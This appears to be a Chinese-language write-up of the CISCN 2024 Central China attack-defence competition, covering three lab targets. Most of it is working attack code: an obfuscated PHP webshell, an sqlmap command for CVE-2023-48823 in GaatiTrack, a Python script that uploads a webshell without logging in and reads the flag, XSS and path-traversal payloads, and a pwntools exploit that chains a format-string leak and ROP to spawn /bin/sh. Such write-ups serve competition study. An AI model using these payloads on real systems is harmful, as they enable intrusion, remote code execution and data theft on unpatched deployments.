CISCN华中2024AWD WP

gaatitrack

漏洞1:免杀混淆马

1
<?php goto PFBx1; CEKfL: $WFOjN = substr((string) $tCGqQ->getName(), 1, 3) . substr((string) $tCGqQ->getName(), 8); goto i8J9H; PFBx1: class ssysgametem { public $u0yA0; } goto cYm2s; VUGem: @($tCGqQ->u0yA0 = $_POST[substr((string) $tCGqQ->getName(), 4, 4)]); goto CEKfL; cYm2s: $tCGqQ = new ReflectionClass("\x73\163\x79\x73\x67\141\x6d\x65\164\x65\x6d"); goto VUGem; i8J9H: @$WFOjN($tCGqQ->u0yA0);

将$WFOjN参数打印出来,发现是system,但是直接打印system函数里的内容tCGqQ->u0yA0没用,Ctrl+F搜索到通过一个post传参,将里面的内容打印出来,得到system执行的参数game

1
echo @$WFOjN,'		',substr((string) $tCGqQ->getName(), 4, 4);

4pzcws6b

验证

image-20240829135433248

漏洞2: CVE-2023-48823

/var/www/html/ajax.php中email参数存在sql盲注,详细GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm (packetstormsecurity.com)

1
python3 sqlmap.py -u "http://192.168.232.133:7001/ajax.php?action=login"  --data="email=test%40"   -a   --batch

image-20240828220128460

漏洞3:后台账户密码泄露

网站子目录Credentials下username and password.txt存在账户密码

1
2
Username : mayuri.infospace@gmail.com
Password : admin

漏洞4:后台任意文件上传

后台管理账户管理处存在任意文件上传

image-20240829120821581

生成时间戳+‘_’+文件名的木马,poc如下,无需登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import time
import requests
ip="http://192.168.232.133:7001/"
burp0_url = ip+"/ajax.php?action=update_user"
burp0_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary8BMXafUA11P6WdIS", "Origin": "http://192.168.232.133:7001", "Referer": "http://192.168.232.133:7001/index.php?page=home", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = "------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nMayuri K\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nK\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"email\"\r\n\r\nmayuri.infospace@gmail.com\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary8BMXafUA11P6WdIS\r\nContent-Disposition: form-data; name=\"img\"; filename=\"1.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @system($_POST['a']);?>\r\n------WebKitFormBoundary8BMXafUA11P6WdIS--\r\n"
res=requests.post(burp0_url, headers=burp0_headers,  data=burp0_data)
t=int(time.time())
print(t)
for i in range(100):
    url=ip+'assets/uploads/'+str(t-i)+'_1.php'
    #print(url)
    data={'a':'cat /flag.txt'}
    c=requests.post(url,data)
    if  c.status_code == 200:
        print(url)
        print(c.text)
        break

漏洞5:xss

1
/manage_parcel_status.php?id=\"><sCrIpT>alert(document.cookie)</sCrIpT>"

warehouse

漏洞1:任意文件读取

重新搭建后需要给用户头像上传图片后才能执行

poc:

1
/file/showImageByPath?path=../../../../../../../../../flag

漏洞2:后台弱口令

在db.sql文件里搜索超级管理员,得到system管理员账号,弱口令123456登录管理员

漏洞3:任意用户重置管理员密码

poc:

1
/user/resetPwd/1   #1为超级管理员的id

image-20241204204228210

漏洞4:未授权访问

poc:

1
/user/loadAllUser

漏洞5:XSS漏洞

商品进货/销售处添加,备注存在xss漏洞

image-20241204204809713

image-20241204204758516

game

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
import struct
from pwn import *
import warnings
warnings.filterwarnings("ignore", category=BytesWarning)

DELTA = 0x9e3779b9

def xxtea_encrypt(data, key):
    def mx(sum, y, z, p, e, key):
        return (((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))

    n = len(data) - 1
    z = data[n]
    y = data[0]
    sum = 0
    q = 6 + 52 // (n + 1)
    while q > 0:
        q -= 1
        sum = (sum + DELTA) & 0xffffffff
        e = (sum >> 2) & 3
        for p in range(n):
            y = data[p + 1]
            z = data[p] = (data[p] + mx(sum, y, z, p, e, key)) & 0xffffffff
        y = data[0]
        z = data[n] = (data[n] + mx(sum, y, z, n, e, key)) & 0xffffffff
    return data

def xxtea_decrypt(data, key):
    def mx(sum, y, z, p, e, key):
        return (((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))

    n = len(data) - 1
    z = data[n]
    y = data[0]
    q = 6 + 52 // (n + 1)
    sum = (q * DELTA) & 0xffffffff
    while sum != 0:
        e = (sum >> 2) & 3
        for p in range(n, 0, -1):
            z = data[p - 1]
            y = data[p] = (data[p] - mx(sum, y, z, p, e, key)) & 0xffffffff
        z = data[n]
        y = data[0] = (data[0] - mx(sum, y, z, 0, e, key)) & 0xffffffff
        sum = (sum - DELTA) & 0xffffffff
    return data

def str_to_uint32(data):
    n = (len(data) + 3) // 4
    data = data.ljust(n * 4, '\0')
    return list(struct.unpack(f'<{n}I', data.encode('utf-8')))

def uint32_to_str(data):
    return struct.pack(f'<{len(data)}I', *data).decode('utf-8').rstrip('\0')


key = [0x12345678, 0x9abcdef0, 0x11223344, 0x55667788]
text = "Hello, Welcome to CISCN, CTFer!"
data = str_to_uint32(text)
# print("Original data:", data)
encrypted_data = xxtea_encrypt(data.copy(), key)
# print("Encrypted data:", encrypted_data)
encrypted_text = ''.join(f'{x:08x}' for x in encrypted_data)
# print("Encrypted text:", encrypted_text)

lg     = lambda s          : log.success('\033[1;32;1m%s\033[0m -> \033[1;36;1m0x%x\033[0m' % (s, eval(s)))
print(encrypted_text)

def dbg(gdbscript = None):
    context.terminal = ["tmux", "splitw", "-h"]
    gdb.attach(io,"gcinit -m64 2.31\n"+str(gdbscript))
    pause()


io = process('./pwn')  
#io=remote('127.0.0.1',9999)
libc = ELF('./libc-2.31.so')
context.log_level = 'debug'

payload = encrypted_text
payload += str('%p%29$p')
io.recvuntil('Enter your login text:')
io.sendline(payload)

io.recvuntil('453a8f8cfa6533fbd8cbf90fd61e1ec517194f21c734a1f4586449aff8a8cf92')
leak_addr = int(io.recv(14),16)
lg('leak_addr')

offset = 0x7f7e0a864723 - 0x7f7e0a677000
libc.address = leak_addr - offset
lg('libc.address')

system = libc.sym['system']
bin_sh = next(libc.search(b"/bin/sh"))

canary = int(io.recv(18),16)
lg('canary')

payload = b'a'*136
payload += p64(canary)
payload += p64(0)
# 0x0000000000023b6a: pop rdi; ret;
# 0x00000000000be2f9: ret;
payload += p64(libc.address + 0x0000000000023b6a)
payload += p64(libc.search(b"/bin/sh").__next__())
payload += p64(libc.address + 0x00000000000be2f9)
payload += p64(libc.sym['system'])

# dbg()
io.sendline(payload)
io.sendline('\n\nfind flag -exec /bin/sh -p \;')

io.interactive()
CISCN华中2024AWD WP
http://tmagwaro.github.io/2024/07/29/gaatitrack/
作者
TMagWarO
发布于
2024年7月29日
许可协议